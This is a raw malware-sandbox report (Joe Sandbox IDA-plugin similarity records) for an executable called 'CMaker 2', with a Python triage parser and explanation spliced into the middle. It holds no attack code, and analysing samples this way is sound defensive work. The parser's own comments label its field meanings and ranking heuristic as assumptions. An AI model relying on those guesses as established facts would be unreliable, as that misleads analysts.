                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: e49820b8979c690efdc8f417affac154591ffe1afff9525a5d7d63ed5cda887b
                                                                                                                                                                                  • Instruction ID: d2e8a9e5d977c947a657a9c427837112b747ae5b647d703ec3207a73020cad26
                                                                                                                                                                                  • Opcode Fuzzy Hash: e49820b8979c690efdc8f417affac154591ffe1afff9525a5d7d63ed5cda887b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8801C865A1878241EB04DB529940079AA95BF86FE0F8C82B4DE7C97BD6EF7CE4018700
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: e4f567e3a19c005c49da197f73f21ba5d7ee1f9e2fe88391b5d22af82dd2e2e8
                                                                                                                                                                                  • Instruction ID: c49053492b93b57508826deb03dc04dc76e046a450f41101e003b5247a60bbf2
                                                                                                                                                                                  • Opcode Fuzzy Hash: e4f567e3a19c005c49da197f73f21ba5d7ee1f9e2fe88391b5d22af82dd2e2e8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4001842CE1D68341FF546BE1694117952B4AF03790F9C55FDE93DC2AC7FE2DA4918200
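The similarity records above are the raw material for triage: most entries in this dump are CRT housekeeping (_invalid_parameter_noinfo, _fread_nolock), while the one tagged HandleModule$AddressFreeLibraryProc resolves imports at run time and is the kind of function worth opening in a disassembler first. The following parser is an added example for this page and is not Joe Sandbox code. It reads the record layout as rendered here, splits the .sdmp dump-file names into fields, and ranks functions by their API ID. Assumptions, labelled in the code: the meaning of the .sdmp name fields (inferred from the values on this page; the fifth field matches the Win32 PAGE_* constants), the loader/CRT ranking heuristic, and the sample text, which is a constructed excerpt of three records copied from this section with the third cut off where the page cuts it.

```python
"""Parse 'Joe Sandbox IDA Plugin / Similarity' records and rank them.

Added example for this page, not Joe Sandbox code. The .sdmp field names
below are assumptions inferred from the values on the page; the ranking
heuristic is likewise an assumption.
"""
import re

# Exact winnt.h memory-protection constants.
PAGE_PROT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# <proc>.<stage>.<dump id>.<base>.<protect>.<state>.<type>.<index>.sdmp
# Field names are assumed; only 'base' and 'protect' are used for triage.
SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<state>[0-9A-F]{8})\."
    r"(?P<type>[0-9A-F]{8})\.(?P<index>[0-9A-F]{8})\.sdmp", re.I)

# "Name.MODULE(args), ref: <address>" as printed under the APIs heading.
API_CALL_RE = re.compile(
    r"(?P<name>\w+)\.(?P<module>[A-Za-z0-9_]+)\(.*\), ref: (?P<ref>[0-9A-Fa-f]+)")

# Assumed heuristic: API IDs naming loader / import-resolution / process
# calls rank first; CRT internals (leading underscore) rank last.
LOADER_TOKENS = ("Library", "Module", "Proc")


def parse_sdmp(name):
    """Split a .sdmp dump name into fields (names assumed, see above)."""
    m = SDMP_RE.search(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    fields = {k: int(v, 16) for k, v in m.groupdict().items() if k != "dump_id"}
    fields["dump_id"] = int(m["dump_id"])
    fields["protect"] = PAGE_PROT.get(fields["protect"], hex(fields["protect"]))
    return fields


def parse_records(text):
    """Yield one dict per function record. A record closes at its
    'Instruction Fuzzy Hash' line, or at end of input if it is truncated."""
    rec = {"calls": []}
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()   # drop layout bullets/indent
        if line.startswith("Source File:"):
            rec["source"] = line.split(":", 1)[1].split(",")[0].strip()
        elif line.startswith("API ID:"):
            rec["api_id"] = line.split(":", 1)[1].strip()
        elif line.startswith("Opcode ID:"):
            rec["opcode_id"] = line.split(":", 1)[1].strip()
        elif line.startswith("Instruction Fuzzy Hash:"):
            rec["ifh"] = line.split(":", 1)[1].strip()
            yield rec
            rec = {"calls": []}
        else:
            m = API_CALL_RE.search(line)   # API lines, incl. "Part of subcall"
            if m:
                rec["calls"].append((m["name"], m["module"].upper(), int(m["ref"], 16)))
    if rec["calls"] or len(rec) > 1:      # truncated trailing record
        yield rec


def triage(records):
    """Return (api_id, verdict, protection) triples, most interesting first."""
    order = {"loader": 0, "other": 1, "unknown": 2, "crt": 3}
    out = []
    for r in records:
        api = r.get("api_id", "")
        if not api:
            verdict = "unknown"            # no Similarity block seen
        elif any(tok in api for tok in LOADER_TOKENS):
            verdict = "loader"
        elif api.startswith("_"):
            verdict = "crt"
        else:
            verdict = "other"
        prot = parse_sdmp(r["source"])["protect"] if "source" in r else "?"
        out.append((api, verdict, prot))
    return sorted(out, key=lambda t: order[t[1]])


# Constructed excerpt of three records from this page; the third is cut off
# after its API calls exactly where the page is.
SAMPLE = """\
APIs
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
Similarity
• API ID: _fread_nolock
• API String ID: 840049012-0
• Opcode ID: 8c844d6f8503df5aee10f6e9fa1b41c48229a7534358f50c5bfe35e86bfe2d9e
• Instruction Fuzzy Hash: 8221BF25B0829245FB149B6268943BA9651BF4ABC4FCC50F0EE2C8B7C6EE7CE841C200
APIs
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
Similarity
• API ID: HandleModule$AddressFreeLibraryProc
• API String ID: 3947729631-0
• Opcode ID: 17f176ca5aa3c2f8f98eb4cc2a4ffa9626262bee32bb74a9f5e9abb4ca5ae358
• Instruction Fuzzy Hash: 7B21923AE0474689EB249FA4C4402FC33A0FB49718F98467ADB2D87AC9EF38D544C780
APIs
  • Part of subcall function 00007FF6FABFD444: HeapAlloc.KERNEL32(?,?,?,00007FF6FABFD3AD,?,?,?,00007FF6FABF105F), ref: 00007FF6FABFD482
• RtlReAllocateHeap.NTDLL(?,?,00000000,00007FF6FAC0323B,?,?,?,00007FF6FABF9B57,?,?,?,00007FF6FABF9A4D,?,?,?,00007FF6FABF9E2E), ref: 00007FF6FAC07D41
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
"""


if __name__ == "__main__":
    for api, verdict, prot in triage(list(parse_records(SAMPLE))):
        print(f"{verdict:8} {prot:20} {api or '(no Similarity block)'}")
```

Run it on a saved copy of the report's IDA-plugin section instead of SAMPLE to get the same ranking across all functions; the "Download File" link text that the page appends to Associated lines is ignored because the parser only keys on the labelled fields.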
APIs
  • Part of subcall function 00007FF6FABFD444: HeapAlloc.KERNEL32(?,?,?,00007FF6FABFD3AD,?,?,?,00007FF6FABF105F), ref: 00007FF6FABFD482
• RtlReAllocateHeap.NTDLL(?,?,00000000,00007FF6FAC0323B,?,?,?,00007FF6FABF9B57,?,?,?,00007FF6FABF9A4D,?,?,?,00007FF6FABF9E2E), ref: 00007FF6FAC07D41
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
                                                                                                                                                                                  • API ID: Heap$AllocAllocate
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2177240990-0
                                                                                                                                                                                  • Opcode ID: ae69f3f87eae71f9e6285b2100481e95f613aacc1c1392977414a10ce1b11ecd
                                                                                                                                                                                  • Instruction ID: 31b8564022fc450fd39256388690db01ab6e283b0b869b81bf698d171e16fceb
                                                                                                                                                                                  • Opcode Fuzzy Hash: ae69f3f87eae71f9e6285b2100481e95f613aacc1c1392977414a10ce1b11ecd
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A016D94F1CB4380FF6C6B63A54127912B06F85BA0F58E6B5DD3ECA2C6FE2CE4404610
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6FABEB290
                                                                                                                                                                                    • Part of subcall function 00007FF6FABEBCB8: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF6FABEBCC0
                                                                                                                                                                                    • Part of subcall function 00007FF6FABEBCB8: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF6FABEBCC5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1208906642-0
                                                                                                                                                                                  • Opcode ID: e406b6a13abdc1de8099012e77fa9b1984323fd7cc8c2502f81400eb426856bf
                                                                                                                                                                                  • Instruction ID: d88ef5c0772c5416629be275dd50af88210be3c188cf798299d2cdc07582ba01
                                                                                                                                                                                  • Opcode Fuzzy Hash: e406b6a13abdc1de8099012e77fa9b1984323fd7cc8c2502f81400eb426856bf
                                                                                                                                                                                  • Instruction Fuzzy Hash: 00E0E224D1D24381FFA92BA195C63BC0B801F63345FC098F9D87EE22C3BE0E74862621
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: e8a23966574a6a3d2edb6134bf375df8a5be86d2f78f2125052a9c69a71dc0e7
                                                                                                                                                                                  • Instruction ID: df4a62a92024d4ff156cb6ecb220791efb757d5b8f8c9fd2bba33392e95afda3
                                                                                                                                                                                  • Opcode Fuzzy Hash: e8a23966574a6a3d2edb6134bf375df8a5be86d2f78f2125052a9c69a71dc0e7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 90E0EC6CE6820746FF153AE549831B911248F16340FDC44FDDA29C62D7FE1C6D955621
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,00000000,00007FF6FABFAEAA,?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012), ref: 00007FF6FABFEBD9
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                  • Opcode ID: c8b9bc297ccf02c34bc4185cf4e45d41bb4c7179ccb82eebce59f868c6ce7279
                                                                                                                                                                                  • Instruction ID: 8eb983a54ec2f80432d26435a3a5141e26449c1f0029748d0438bcef924574f5
                                                                                                                                                                                  • Opcode Fuzzy Hash: c8b9bc297ccf02c34bc4185cf4e45d41bb4c7179ccb82eebce59f868c6ce7279
                                                                                                                                                                                  • Instruction Fuzzy Hash: 86F06D4CB0D20785FF685AE599813B952945FC6B80F8C50B9C92FC63C7FD2DE4808220
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,?,00007FF6FABFD3AD,?,?,?,00007FF6FABF105F), ref: 00007FF6FABFD482
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                  • Opcode ID: 518377c8398ba572112478f17d195ad13ea908693e0d1cf717003d4179de8268
                                                                                                                                                                                  • Instruction ID: ab8cfafde7a397d9b1bbcd76148687cc9f4a81d96efdd2950c31e89f5d898a40
                                                                                                                                                                                  • Opcode Fuzzy Hash: 518377c8398ba572112478f17d195ad13ea908693e0d1cf717003d4179de8268
                                                                                                                                                                                  • Instruction Fuzzy Hash: F1F01C59B1D24785FF646BE2584137912915F867B4F8C97B8DD3EC62C2FE2CF4804260
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE42F0
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE4331
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE4356
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE437B
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE43A3
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE43CB
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE43F3
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE441B
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE4443
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                  • API String ID: 190572456-2007157414
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 808467561-2761157908
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID:
• String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
• API String ID: 0-2665694366
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: FileFindFirst_invalid_parameter_noinfo
• String ID:
• API String ID: 2227656907-0
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID: %ls: %ls$<FormatMessageW failed.>
• API String ID: 3479602957-1483686772
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                  • Opcode ID: c5f1a451cea918b3d295fbd489f38e5bd1b238518de27717531c6a83961092e0
                                                                                                                                                                                  • Instruction ID: 2b74d2cd3a17fe161126b648920d5fd9407b83312d6fe739ee151535b486d9be
                                                                                                                                                                                  • Opcode Fuzzy Hash: c5f1a451cea918b3d295fbd489f38e5bd1b238518de27717531c6a83961092e0
                                                                                                                                                                                  • Instruction Fuzzy Hash: C0111862B14F058AEB00CB60E8542B833B4FB19758F441E35DA6DC67A4EF78E1548340
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy_s
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1502251526-0
                                                                                                                                                                                  • Opcode ID: 57a8bb62846f71c15516153ffb7b4828fa003a6834a4406426bc392e6d140f03
                                                                                                                                                                                  • Instruction ID: 3839d95378488cfe6913696fae5606bf12ddd2708c3c1ccc6a859f22ea3687a5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 57a8bb62846f71c15516153ffb7b4828fa003a6834a4406426bc392e6d140f03
                                                                                                                                                                                  • Instruction Fuzzy Hash: 28C1F6B2B1868587D724CF19A04866AB7A1F794B84F45E235DB6EC7784EF3DE801CB40
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
